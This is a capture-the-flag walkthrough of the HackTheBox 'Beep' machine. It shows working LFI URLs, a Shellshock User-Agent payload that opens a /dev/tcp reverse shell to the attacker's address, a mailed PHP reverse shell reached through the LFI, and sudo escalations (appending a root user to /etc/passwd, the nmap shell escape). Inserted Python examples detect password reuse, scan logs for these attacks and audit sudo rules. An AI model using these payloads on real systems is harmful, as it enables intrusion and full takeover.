HackTheBox - Beep Walkthrough

July 19, 2019

Beep

Easy Linux box with lots of paths to root: LFI with password reuse, LFI to RCE via mail, Shellshock and so on.

1. Recon and Information gathering

Nmap

root@kali:/vagrant/hackthebox/beep# nmap -sV -sC 10.10.10.7 -oN base_tcp.nmap
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-07-17 20:25 EEST
Nmap scan report for 10.10.10.7
Host is up (0.033s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: EXPIRE(NEVER) APOP LOGIN-DELAY(0) TOP STLS RESP-CODES USER PIPELINING AUTH-RESP-CODE UIDL IMPLEMENTATION(Cyrus POP3 server v2)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ID LITERAL+ ATOMIC CATENATE CHILDREN X-NETSCAPE CONDSTORE LISTEXT URLAUTHA0001 IMAP4 LIST-SUBSCRIBED NO IDLE OK SORT=MODSEQ STARTTLS THREAD=REFERENCES MAILBOX-REFERRALS MULTIAPPEND IMAP4rev1 NAMESPACE ANNOTATEMORE RENAME SORT BINARY UNSELECT RIGHTS=kxte THREAD=ORDEREDSUBJECT ACL QUOTA UIDPLUS Completed
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Elastix - Login page
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2019-07-17T17:23:25+00:00; -4m57s from scanner time.
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: -4m57s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 290.44 seconds

Additionally, scanning all ports turned up some less common open ports:

879/tcp   open  unknown
4190/tcp  open  sieve
4559/tcp  open  hylafax
5038/tcp  open  unknown

Let’s get some more info on them:

root@kali:/vagrant/hackthebox/beep# nmap -sV -sC 10.10.10.7 -p 879,4190,4559,5038 -oN more_tcp.nmap
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-07-18 13:14 EEST
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.036s latency).

PORT     STATE  SERVICE  VERSION
879/tcp  closed unknown
4190/tcp open   sieve    Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4559/tcp open   hylafax  HylaFAX 4.3.10
5038/tcp open   asterisk Asterisk Call Manager 1.1
Service Info: Host: localhost; OS: Unix

Services

HTTP

So I have an “Elastix” app, no idea what it is. Let’s google a bit and see if there’s something interesting.

Okay, so it’s PBX software: mail, calls, etc. And directory brute-forcing shows a looot of directories: roundcube, a voicemail login, various directories without indexes, etc.

root@kali:/vagrant/hackthebox/beep# gobuster dir -w /opt/wordlists/directory-medium.txt -u https://10.10.10.7 -k -t 50 -x php,txt,zip
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7
[+] Threads:        50
[+] Wordlist:       /opt/wordlists/directory-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,zip
[+] Timeout:        10s
===============================================================
2019/07/17 21:37:19 Starting gobuster
===============================================================
/images (Status: 301)
/help (Status: 301)
/index.php (Status: 200)
/register.php (Status: 200)
/modules (Status: 301)
/themes (Status: 301)
/mail (Status: 301)
/admin (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/config.php (Status: 200)
/robots.txt (Status: 200)
/var (Status: 301)
/panel (Status: 301)
/libs (Status: 301)
/recordings (Status: 301)
/configs (Status: 301)
<...>

Searchsploit also lists some vulns, but I need to check whether they apply to this version:

root@kali:/vagrant/hackthebox/beep# searchsploit elastix
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                             |  Path
                                                                                                                           | (/opt/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Elastix - 'page' Cross-Site Scripting                                                                                      | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                                                    | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                              | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                                           | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                                                          | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                                                         | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                                                     | exploits/php/webapps/18650.py
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------

Asterisk

The VoIP service has quite a list of vulns; I have to check whether they are present in the version the server runs.

root@kali:/vagrant/hackthebox/beep# searchsploit Asterisk
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                                                                      |  Path
                                                                                                                                    | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection                                                       | exploits/linux/remote/30677.pl
Asterisk - 'ast_parse_digest()' Stack Buffer Overflow (PoC)                                                                         | exploits/linux/dos/18855.txt
Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access                                                                                | exploits/cgi/webapps/26475.txt
Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)                                                                 | exploits/multiple/dos/2597.pl
Asterisk 1.2.15/1.4.0 - Remote Denial of Service                                                                                    | exploits/multiple/dos/3407.c
Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service                                                                         | exploits/multiple/dos/3566.pl
Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash                                                                 | exploits/multiple/dos/5749.pl
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (1)                                                          | exploits/multiple/dos/29900.txt
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (2)                                                          | exploits/multiple/dos/29901.txt
Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities                                                | exploits/linux/dos/31440.txt
Asterisk 1.6 IAX - 'POKE' Requests Remote Denial of Service                                                                         | exploits/linux/dos/32095.pl
Asterisk 1.8.4.1 - SIP 'REGISTER' Request User Enumeration                                                                          | exploits/linux/remote/35801.txt
Asterisk 1.8.x - SIP INVITE Request User Enumeration                                                                                | exploits/multiple/remote/35685.txt
Asterisk 1.x - BYE Message Remote Denial of Service                                                                                 | exploits/multiple/dos/30974.txt
Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption                                                                           | exploits/multiple/dos/43992.py
Asterisk < 1.2.22/1.4.8 - IAX2 Channel Driver Remote Crash                                                                          | exploits/multiple/dos/4249.rb
Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service                                                              | exploits/multiple/dos/4196.c
Asterisk IAX2 - Attacked IAX Fuzzer Resource Exhaustion (Denial of Service)                                                         | exploits/multiple/dos/8940.pl
Asterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities                                                                 | exploits/linux/remote/24221.pl
Asterisk Recording Interface 0.7.15 - 'Audio.php' Information Disclosure                                                            | exploits/multiple/remote/27716.txt
Asterisk Recording Interface 0.7.15/0.10 - Multiple Vulnerabilities                                                                 | exploits/multiple/remote/34301.txt
Asterisk chan_pjsip 15.2.0 - 'INVITE' Denial of Service                                                                             | exploits/linux/dos/44181.py
Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service                                                                           | exploits/linux/dos/44183.py
Asterisk chan_pjsip 15.2.0 - 'SDP' Denial of Service                                                                                | exploits/linux/dos/44182.py
Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption                                                                           | exploits/linux/dos/44184.py
Asteriskguru Queue Statistics - 'warning' Cross-Site Scripting                                                                      | exploits/php/webapps/38375.txt
Fonality trixbox - 'asterisk_info.php' Directory Traversal                                                                          | exploits/php/webapps/39349.txt
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------

Webmin

For Webmin we have Shellshock to try (hello, CGI!).

2. Initial foothold / low-priv access

The easiest way is to use the LFI vuln in vtigercrm (exploits/php/webapps/37637.pl). The null byte at the end of the path truncates whatever the script appends to the language name, so an arbitrary file gets included:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action

HTTP/1.1 200 OK
Date: Fri, 19 Jul 2019 13:12:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13779


AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE


AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin

AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin 

FOPWEBROOT=/var/www/html/panel
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin

ARI_ADMIN_PASSWORD=jEhdIekWmdjE

AUTHTYPE=database

ASTETCDIR=/etc/asterisk
ASTMODDIR=/usr/lib/asterisk/modules
ASTVARLIBDIR=/var/lib/asterisk
ASTAGIDIR=/var/lib/asterisk/agi-bin
ASTSPOOLDIR=/var/spool/asterisk
ASTRUNDIR=/var/run/asterisk
ASTLOGDIR=/var/log/asterisk
Sorry! Attempt to access restricted file.


https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.

https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//home/fanis/user.txt%00&module=Accounts&action
<...> 
Sorry! Attempt to access restricted file.

Tried connecting to mysql with the credentials I found with the LFI, but no luck:

root@kali:/vagrant/hackthebox/beep# mysql -u asteriskuser -h 10.10.10.7 -p
Enter password: 
ERROR 1130 (HY000): Host '10.10.14.25' is not allowed to connect to this MySQL server

Aand… trying the users from /etc/passwd over SSH with the password from amportal.conf, I get a match for root…:

root@kali:/vagrant/hackthebox/beep# ssh root@10.10.10.7
root@10.10.10.7's password: 
Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@beep ~]# cat /root/root.txt 
<...>

Damn password reuse :/
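The amportal.conf dump above is the whole story of this path: one value sits behind four different keys and is also the root password. The following is an added example (not from the walkthrough or from Elastix) of the check a defender can run over such KEY=VALUE configs to surface that kind of reuse before an attacker does. The sample config and the PlaceholderPass* values are constructed for the example.

```python
import re
from collections import defaultdict

# Keys whose value should be treated as a secret (case-insensitive substring match).
SECRET_KEY_RE = re.compile(r'PASS|SECRET|TOKEN', re.IGNORECASE)

# Constructed amportal.conf-style sample with placeholder passwords, not the box's values.
SAMPLE_CONF = '''\
# FreePBX / Elastix main config (constructed sample)
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=PlaceholderPassA
AMPMGRUSER=admin
AMPMGRPASS=PlaceholderPassA
FOPPASSWORD=PlaceholderPassA
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=PlaceholderPassB
AUTHTYPE=database
'''


def parse_kv(text):
    """Parse KEY=VALUE lines into a dict, skipping blank lines and # comments."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#') or '=' not in line:
            continue
        key, _, value = line.partition('=')
        conf[key.strip()] = value.strip()
    return conf


def reused_secrets(text):
    """Map every secret value that appears under more than one key to the sorted list of those keys.

    Each distinct component (DB, manager interface, operator panel, ARI) should get its own
    credential; a value shared across them means one file read exposes all of them at once.
    """
    by_value = defaultdict(list)
    for key, value in parse_kv(text).items():
        if value and SECRET_KEY_RE.search(key):
            by_value[value].append(key)
    return {value: sorted(keys) for value, keys in by_value.items() if len(keys) > 1}


if __name__ == '__main__':
    for value, keys in reused_secrets(SAMPLE_CONF).items():
        # Never print the secret itself in a real audit; the key names are enough to act on.
        print(f'one value reused by {len(keys)} keys: {", ".join(keys)}')
```

The report names keys rather than values, so it can be safely attached to a ticket. Checking the OS accounts against the same values (the step that gave root here) needs the password hashes and is left to the usual offline cracking tools.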

Shellshock

I put the payload in the User-Agent header and used a /dev/tcp reverse shell for blind Shellshock against Webmin’s CGI on port 10000:

GET / HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: () { :;}; bash -i >& /dev/tcp/10.10.14.25/4848 0>&1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ARI=r5hkca7mh8ln12n4la4o8neat1; PHPSESSID=737p48sdv47673q4m1l3mlppd7; elastixSession=3lj6vt1946kqiliifee0655ra2; testing=1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


root@kali:/vagrant/hackthebox/beep# nc -lvnp 4848
listening on [any] 4848 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.7] 58740
bash: no job control in this shell
[root@beep webmin]# id
uid=0(root) gid=0(root)

SMTP + LFI

Maybe the coolest way to pwn the box (credit to ippsec, of course): mail a PHP reverse shell to the asterisk user, then include that user’s mail spool through the LFI:

root@kali:/vagrant/hackthebox/beep# sendemail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s 10.10.10.7:25 -f flame_n@htb.eu
Jul 19 15:12:14 kali sendemail[11143]: Email was sent successfully!

Start a netcat listener, then open https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action so the mail spool, which now contains the PHP, gets included, aaand: profit!

root@kali:/vagrant/hackthebox/beep# nc -lvnp 4949
listening on [any] 4949 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.7] 35358
Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux
 22:08:39 up  5:00,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
sh: no job control in this shell
sh-3.2$ 
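All three footholds above (the graph.php LFI, the Shellshock User-Agent, and the LFI read of the mail spool) leave a recognizable trace in the web server's access log. The following is an added example, not part of the walkthrough, of the detection a defender would run over those logs: it parses Apache combined-format lines (an assumption; Webmin keeps its own log format), percent-decodes the request target once, and flags traversal sequences, embedded null bytes and the "() {" prefix that Shellshock needs. The log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" log format; not taken from the box.
SAMPLE_LOG = '''\
10.10.14.25 - - [19/Jul/2019:13:10:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.25 - - [19/Jul/2019:13:12:58 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 13779 "-" "Mozilla/5.0"
10.10.14.25 - - [19/Jul/2019:13:20:11 +0000] "GET / HTTP/1.1" 200 1234 "-" "() { :;}; echo probe"
10.10.14.25 - - [19/Jul/2019:13:21:45 +0000] "GET /vtigercrm/graph.php?current_language=..%2F..%2F..%2Fvar%2Fspool%2Fmail%2Fasterisk%00&module=Accounts HTTP/1.1" 200 2048 "-" "curl/7.64.0"
'''

# Apache combined log format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

TRAVERSAL_RE = re.compile(r'\.\.[\\/]')   # "../" or "..\" after percent-decoding
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')  # the function-definition prefix Shellshock relies on


def analyze_line(line):
    """Return a dict describing one log line and its findings, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    # Decode once, as the web application would, so "..%2F" and "%00" are caught too.
    decoded = unquote(m.group('target'))
    if TRAVERSAL_RE.search(decoded):
        findings.append('path-traversal')
    if '\x00' in decoded:
        findings.append('null-byte')
    # Shellshock payloads arrive in any header copied into the CGI environment; UA and
    # Referer are the two that a combined-format log preserves.
    for field in ('ua', 'referer'):
        if SHELLSHOCK_RE.search(m.group(field)):
            findings.append('shellshock-' + field)
    return {
        'ip': m.group('ip'),
        'ts': m.group('ts'),
        'target': m.group('target'),
        'status': int(m.group('status')),
        'findings': findings,
    }


def scan_log(text):
    """Return only the parsed lines that triggered at least one finding, in log order."""
    hits = []
    for line in text.splitlines():
        rec = analyze_line(line)
        if rec and rec['findings']:
            hits.append(rec)
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        # A 200 next to a traversal finding is the case to escalate: the include likely worked.
        print(hit['ts'], hit['ip'], hit['status'], ','.join(hit['findings']), hit['target'])
```

A traversal hit with status 200, as in the amportal.conf request, is the one to treat as a confirmed read rather than a probe; the same rule applied to the mail-spool path is what would have caught the RCE variant.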

3. Privilege Escalation

From the asterisk shell, sudo -l shows:

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

Okay… lots of tricks here… nmap, chown, chmod, etc.:

Chown

bash-3.2$ sudo chown asterisk:asterisk /etc/passwd
bash-3.2$ echo "flame:sa/zAjIC0QWtk:0:0::/root/:/bin/bash" >> /etc/passwd
echo "flame:sa/zAjIC0QWtk:0:0::/root/:/bin/bash" >> /etc/passwd

bash-3.2$ su - flame
su - flame
Password: flamen

[root@beep ~]# id
id
uid=0(root) gid=0(root) groups=0(root)

Nmap

bash-3.2$ sudo nmap --interactive
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Service

bash-3.2$ sudo /sbin/service ../../../bin/bash
sudo /sbin/service ../../../bin/bash
[root@beep /]# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

And so on; check out the good folks at https://gtfobins.github.io/.
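The sudoers list is the root cause of every escalation shown above, and it is the kind of thing an administrator can audit mechanically. The following is an added example, not from the walkthrough or from GTFOBins, of a small auditor for sudo -l output: it parses each "(runas) TAG: command" line and flags the binaries this page demonstrates as shell escapes. The RISKY table is constructed from what the page shows and is meant to be extended from GTFOBins; the sample input is the box's own sudo -l output.

```python
import re

# One sudo -l privilege line: "(runas) [TAG: ...] command [args]"
SUDO_LINE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S.*)$'
)

# Binaries the walkthrough abuses, with the reason each is dangerous when run as root.
# Constructed for this example from what the page demonstrates; extend from GTFOBins.
RISKY = {
    'nmap':    'interactive mode on old versions (the box has 4.11) spawns a shell with !sh',
    'chown':   'can hand ownership of /etc/passwd, or any root-owned file, to the caller',
    'chmod':   'can make root-owned files writable by the caller',
    'service': 'resolves its argument under /etc/init.d, so a traversal path runs any binary',
}

# The sudo -l output shown on this page, used here as sample input.
SAMPLE_SUDO_L = '''\
User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
'''


def audit_sudo_l(text):
    """Return (command, runas, nopasswd, reason) for every risky entry in sudo -l output."""
    findings = []
    for line in text.splitlines():
        m = SUDO_LINE_RE.match(line)
        if not m:
            continue                      # header lines and blanks
        cmd = m.group('cmd').split()[0]   # drop any argument restriction for the lookup
        name = cmd.rsplit('/', 1)[-1]     # basename, so /usr/bin/nmap matches 'nmap'
        if name in RISKY:
            findings.append((cmd, m.group('runas'), 'NOPASSWD' in m.group('tags'), RISKY[name]))
    return findings


if __name__ == '__main__':
    for cmd, runas, nopasswd, reason in audit_sudo_l(SAMPLE_SUDO_L):
        tag = 'NOPASSWD' if nopasswd else 'password'
        print(f'{cmd} as {runas} ({tag}): {reason}')
```

Anything the auditor flags should either be removed from sudoers or wrapped in a dedicated script that takes no user-controlled path; the remaining entries such as postmap and chkconfig still deserve a manual look, since the table only knows what this page demonstrates.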

Overall a cool machine: easy, but still a great playground for testing different paths to root.